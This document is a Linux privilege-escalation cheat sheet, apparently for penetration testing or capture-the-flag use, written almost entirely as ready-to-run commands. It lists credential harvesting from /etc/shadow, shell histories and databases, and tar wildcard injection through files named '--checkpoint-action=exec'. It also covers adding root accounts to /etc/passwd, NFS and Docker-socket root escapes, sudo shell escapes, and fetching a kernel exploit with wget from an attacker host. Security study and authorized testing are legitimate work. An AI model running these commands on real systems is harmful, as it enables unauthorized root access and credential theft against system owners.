-> Basic System Enumeration
uname -a
hostname
lscpu
ls /home
ls /var/www/html
ls /var/www/
ps aux | grep root
netstat -tulpn
ps -aux | grep root | grep mysql
ifconfig
find . -type f -exec grep -i -I "PASSWORD=" {} /dev/null \;
locate pass | more
-> Get system distribution and version
cat /etc/*-release
-> Get kernel version
cat /proc/version
uname -a
-> View environment variables
env
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.zshrc
-> View user command history
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
-> List running processes
ps aux
-> Service Footprints
watch -n 1 "ps -aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"
-> View interfaces and network information
ifconfig
ip addr
ss -anp
-> View all active TCP connections and the TCP and UDP ports the host is listening on.
netstat -ant
-> Get DNS resolver and hosts mapped to an IP
cat /etc/resolv.conf
cat /etc/hosts
-> Get system user, group and password information
cat /etc/passwd
cat /etc/shadow
-> psql terminal as postgres user
su postgres
psql
-> list the databases
\list
-> select the database
\c <database>
-> list the tables
\d
-> dump
select * from <table>;
-> read files
CREATE TABLE demo(t text);
COPY demo from '<filename>';
SELECT * FROM demo;
-> access database
sqlite3 <database.db>
-> list the tables
.tables
-> dump
select * from <table>;
mysql -u root -h localhost -p
-> list the databases
show databases;
-> select the database
use <database>;
-> list the tables
show tables;
-> dump
SELECT * FROM <table>;
-> Perform code review on web server files (/var/www/html)
-> Check log files for credentials
-> Enumeration
cat /var/log/cron.log
cat /etc/crontab
crontab -l
/etc/init.d
/etc/cron*
/etc/crontab
/etc/cron.allow
/etc/cron.d
/etc/cron.deny
/etc/cron.daily
/etc/cron.hourly
/etc/cron.monthly
/etc/cron.weekly
ls -lah /etc/cron*
grep "CRON" /var/log/syslog
crontab -l
sudo crontab -l
-> Exploitation
echo "chmod +s /bin/bash" >> script.sh
cat /etc/crontab
-> Output like this
* * * * * root /var/www/html/file.py
-> Modify file
cd /var/www/html/
vi file.py
-> Import lib
import os
os.system("chmod +s /bin/bash")
-> Listing "/etc/crontab" file
* * * * * root /usr/bin/local/file.sh
-> Output
#!/bin/bash
cd /var/www/html/
tar czf /tmp/file2.tar.gz *
-> Exploit
cd /var/www/html/
echo "#!/bin/bash" > priv.sh
echo "chmod +s /bin/bash" >> priv.sh
chmod +x priv.sh
touch /var/www/html/--checkpoint=1
touch /var/www/html/--checkpoint-action=exec=sh\ priv.sh
-> Enumeration
find / -perm -u=s -type f 2>/dev/null
or
id
find / -perm -u=s -type f -group <group> 2>/dev/null
-> Example
find / -perm -u=s -type f 2>/dev/null
/usr/bin/find
/usr/bin/chsh
/usr/bin/passwdflag
-> Permissions
ls -l /usr/bin/passwdflag
-rwsr-xr-x 1 root root 68574 Jan 5 18:00 /usr/bin/passwdflag
-> Searching strings
strings /usr/bin/passwdflag | grep "pass"
-> Exploitation
-> Enumeration
getcap -r / 2>/dev/null
-> Exploitation
sudo -l
or
cat /etc/sudoers
-> Exploitation
sudo -u <username> <command>
-> Enumeration
ls -la /etc/passwd
ls -la /etc/shadow
-> Exploitation
echo "user:$(openssl passwd password123):0:0:root:/root:/usr/bin/bash" >> /etc/passwd
-> Enumeration
find / -writable -type d 2>/dev/null
-> If you have write permission on these files
/etc/passwd
/etc/shadow
/etc/sudoers
-> passwd file
echo 'root2::0:0::/root:/bin/bash' >> /etc/passwd
su - root2
id && whoami
or
openssl passwd -1 -salt mysalt NewP@ssword1
Copy output
echo "root2:<output>:0:0:root:/root:/bin/bash" >> /etc/passwd
Replace <output> with the copied output
su root2
id && whoami
-> Detection - VM Owned
cat /etc/exports
-> Viewing nfs directories with access - Attacker VM
showmount -e <ip>
-> Get nfs version - Attacker VM
rpcinfo <ip>
-> Mount - Attacker VM
mkdir /tmp/1
mount -o rw,vers=2 <ip>:/<nfs_directory> /tmp/1
-> Creating and compiling file for privesc - Attacker VM
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x
-> Exploitation - VM Owned
/tmp/x
id
sudo -u#-1 /bin/bash
-> Search the socket
find / -name docker.sock 2>/dev/null
-> list images
docker images
-> Exploitation
docker run -it -v /:/host/ <image>:<tag> chroot /host/ bash
-> Get information
cat /etc/issue
uname -r
arch
-> Validate installed software
whereis gcc
whereis python
whereis curl
whereis wget
-> Searching public exploit
searchsploit "linux kernel 5.9"
searchsploit -m 50808.c
-> Find files with the SUID permission
find / -perm -u=s -type f 2>/dev/null
-> Move to target and compile
cd /tmp
wget http://<IP>/50808.c
chmod +x 50808.c
gcc 50808.c -o 50808
-> Exploit
./50808 <SUID-FILE>
sudo -l
sudo -u user1 vim
:r /home/user1/file.txt
:!/bin/bash
uid=1001(user1) gid=1001(user1) groups=1001(user1)
sudo -l
sudo -u user1 less /home/user1/file.txt
sudo -u user1 less /etc/passwd
/home/user1/file.txt
!/bin/bash
sudo -u user1 awk '{print $0}' /home/user1/file.txt
sudo -u user1 awk '{system("/bin/bash")}'
sudo -u user1 perl -e 'print `cat /home/user1/file.txt`'
sudo -u user1 perl -e '`/bin/bash`'
sudo -u user1 python
import os
os.system('cat /home/user1/file.txt')
os.system('/bin/bash')
sudo -u user1 /usr/bin/ruby -e'puts `cat /home/user1/key.txt`'
/usr/bin/ruby -e 'require "irb" ; IRB.start(__FILE__)'
sudo -u user1 node -e 'var exec = require("child_process").exec;exec("cat /home/user1/key.txt", function (error, stdOut, stdErr) {console.log(stdOut);});'
sudo -u user1 node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
-> Linpeas
./linpeas.sh
-> pspy (unprivileged Linux process snooping)
./pspy64
-> linux-exploit-suggester
./linux-exploit-suggester.sh
or
./linux-exploit-suggester.sh --uname <uname-string>
-> Unix Privesc Check
./unix-privesc-check